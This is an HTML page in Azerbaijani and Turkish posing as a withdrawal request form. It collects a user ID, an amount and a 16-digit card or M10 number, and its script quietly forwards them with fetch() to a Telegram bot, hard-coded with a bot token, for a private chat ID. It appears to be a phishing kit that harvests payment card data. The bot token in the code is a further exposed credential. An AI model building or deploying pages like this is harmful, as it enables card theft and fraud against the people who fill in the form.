<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Çıxarış göndər</title>
    <style>
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background: linear-gradient(45deg, #838588, #007bff);
        }
        .container {
            width: 350px;
            padding: 100px 20px;
            position: relative;
            top: -60px;
            overflow: hidden;
            border: 1px solid hsl(0, 0%, 80%, 0);
            box-shadow: 0 0 10px 1px rgba(0, 0, 0, 0.7);
            text-align: center;
            background-color: hsla(202, 41%, 35%, 0.3);
            backdrop-filter: blur(15px);
            border-radius: 20px;
        }
        
        img{
            z-index: -1;
            width: 100%; /* Genişlik %100 */
            height: 100%; /* Yükseklik %100 */
            object-fit: cover; /* Görüntüyü div'e sığdır, orantıyı koru */
            position: absolute; /* Mutlak konum */
            top: 50%; /* Yukarıdan ortala */
            left: 50%; /* Soldan ortala */
            transform: translate(-50%, -50%); /* Gerçekten ortala */
        }
        input[type="text"] {
            width: 80%;
            padding: 10px;
            margin: 10px;
            border: 1px solid hsl(0, 0%, 24%, 0.0);
            border-bottom: 0px solid rgba(0, 0, 0, 1);
            background-color: hsla(0, 0%, 80%, 0.0);
            color: #000;
            font-size: 17px;
            border-radius: 7px 7px 0px 0px;
            box-shadow: 0px 0px 0px 0px #333;
            transition: 0s;
        }
        input[type="text"]:hover{
            border-bottom: 1.5px solid rgba(0, 0, 0, 1);
            box-shadow: 0px 0px 10px 1px #333;
            color: #fff;
            transition: 0.1s;
        }
        input::placeholder{
            color: #ccc;
            opacity: 0.5;
            transition: 0s;
        }
        input:hover::placeholder{
            color: #FFF;
            opacity: 0.99;
            transition: 0.5;
        }
        button {
            padding: 10px 100px;
            margin: 50px 10px;
            margin-bottom: 0px;
            background-color: hsl(0, 0%, 0%, 0.01);
            color: white;
            text-shadow: 0px 0px 40px #121, 0px 0px 40px #222, 0px 0px 70px #222;
            border: 1 px solid hsl(0, 0%, 24%, 0.0);
            border-radius: 15px;
            cursor: pointer;
            font-size: 19px;
            box-shadow: 0px 0px 15px 0.5px #000;
            transition: 200ms linear;
        }
        button:hover {
            background-color: #0056b3;
            box-shadow: 0px 0px 10px 1px #000,
                        inset -1px -1px 3px 1px #000;
        }

        .messageBox{
            position: absolute;
            top: 300px;
            left: 50%;
            transform: translateX(-50%);
            width: 250px;
            padding: 20px;
            background-color: rgba(0, 0, 0, 0.8);
            color: white;
            font-size: 16px;
            border-radius: 10px;
            display: none;
        }
        .x_btn{
            color: #FFF;
            position: fixed;
            top: 0px;
            right: 12px;
            font-size: 25px;
            cursor: pointer;
        }
        .YesNo{
            display: block;
            cursor: pointer;
            font-size: 70px;
            color: red;
            
        }
        .YesNo_box{
            position: absolute;
            display: flex;
            width: 200px;
            padding-left: 45%;
            background-color: rgba(0, 0, 0, 0.0);
            color: white;
            opacity: 0.9;
            font-size: 15px;
            border-radius: 5px;
        }

        .InfoBox{
            position: absolute;
            bottom: 0px;
            background-color: hsl(0, 0%, 0%, 0.1);
            width: 100%;
            height: auto;
            box-shadow: 0px 0px 10px 1px ;
            
        }
        .InfoBox *{
            text-shadow: 0px 0px 10px #333;
            padding-right: 15px;
            padding-left: 15px;
        }



    </style>



</head>
<body>


    <img src="https://res.cloudinary.com/people-matters/image/upload/fl_immutable_cache,w_624,h_351,q_auto,f_auto/v1505975932/1505975931.jpg" alt = "Fotoraf bulunmadı">
    
    <div class="container">
        <input type="text" class="text" id = "Entry_ID" placeholder="Isdifadəçi ID">
        <input type="text" class="text" id = "Entry_money" placeholder="Çıxarış məbləgi">
        <input type="text" class="text" id = "Entry_kod" placeholder="M10 & 16 rəgəmli Kart kodu">
        <label class="YesNo_box"><input type="checkbox" id="checkbox" class="YesNo"><u>Məlumatlar dogrudur</u></label>
        <button onclick="mesajGonder()">Isdəy gönder</button>
    </div>


    <div class = "messageBox" id="Sms_box">
        <h4 class="x_btn" id="X_btn"><span onclick="Off_message_box()">&#10006</span></h4>
        <h3>Mesaj:</h3>
        <p id="messageBoxContent">Error</p>
    </div>

    <div id="infoBox" class="InfoBox">
        <h4>Para Gönderme Talebi</h4>
        <h5>Şartlar:

            Gönderim işlemi için yeterli bakiye olmalıdır. Yetersiz bakiye durumunda işlem onaylanmayacaktır.
            
            Girilen Kullanıcı ID'si ve kart/M10 numarası doğru olmalıdır. Yanlış girişlerde para iadesi yapılmayacaktır.
            
            Bu işlemle ilgili hiçbir yükümlülüğümüz yoktur.
            
            
            </h5>
            <h5><b>Not: Lütfen tüm bilgilerinizi dikkatlice kontrol ediniz.</b></h5>
    </div>



    <script>
        function Off_message_box(){
            document.getElementById("Sms_box").style.display="none";
        }
        function mesajGonder() {
                // Entry alanındaki mesajı alıyoruz
                const user_id = document.getElementById('Entry_ID').value;
                const miktar = document.getElementById('Entry_money').value;
                const kod = document.getElementById('Entry_kod').value;
                const mesaj = `ID: ${user_id} \nMəbləğ: ${miktar} \nNumara: ${kod}`;


                if (isNaN(parseInt(user_id))) {
                    messageBoxContent.innerHTML = "Geçersiz User ID. Lütfen sadece sayı girin.";
                    document.getElementById("Sms_box").style.display="block";
                    document.getElementById("Entry_ID").value = ''
                    return;
                }
            
                // Miktarın geçerli bir pozitif sayı olup olmadığını kontrol et
                const miktarFloat = parseFloat(miktar);
                if (isNaN(miktarFloat) || miktarFloat <= 0) {
                    messageBoxContent.innerHTML = "Geçersiz miktar. Lütfen pozitif bir sayı girin.";
                    document.getElementById("Sms_box").style.display="block";
                    document.getElementById("Entry_money").value = ''

                    return;
                }
            
                // Kodun boş olup olmadığını kontrol et
                if (!kod.trim()) {
                    messageBoxContent.innerHTML = "Kod boş olamaz. M10 & Kartın 16 rəqəmi";
                    document.getElementById("Sms_box").style.display="block";
                    document.getElementById("Entry_kod").value = ''

                    return;
                }

                if (checkbox.checked) {
                    messageBoxContent.innerHTML = "mesac ugurla gonderildi";
                    document.getElementById("Sms_box").style.display="block";
                    
                }
                else {
                    messageBoxContent.innerHTML = "Şərtlər grbul olunmadı!";
                    document.getElementById("Sms_box").style.display="block";
                    return;
                }

            
                // Mesaj geçerli ise burada işleme devam edebilirsiniz
                message = `ID: ${user_id} \nMəbləğ: ${miktarFloat} \n Kod: ${kod}`;
                messageBoxContent.innerHTML = `ID: ${user_id} \nMəbləğ: ${miktarFloat} \n Kod: ${kod}`;

                document.getElementById("Entry_ID").value = ''
                document.getElementById("Entry_kod").value = ''
                document.getElementById("Entry_money").value = ''
                messageBoxContent.innerHTML = `isdek gonderildi\n${message}`
                document.getElementById("Sms_box").style.display="block";
                // Telegram API'si üzerinden mesaj gönderme
                fetch('https://api.telegram.org/bot7305999237:AAEZKowGcSZWf3btGW0dYOtT2TWlwpxXlzY/sendMessage', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({
                        chat_id: '6726703804',  // Sizin Chat ID'niz
                        text: mesaj             // Entry'den alınan mesajı gönderiyoruz
                    })
                })}

    </script>
</body>
</html>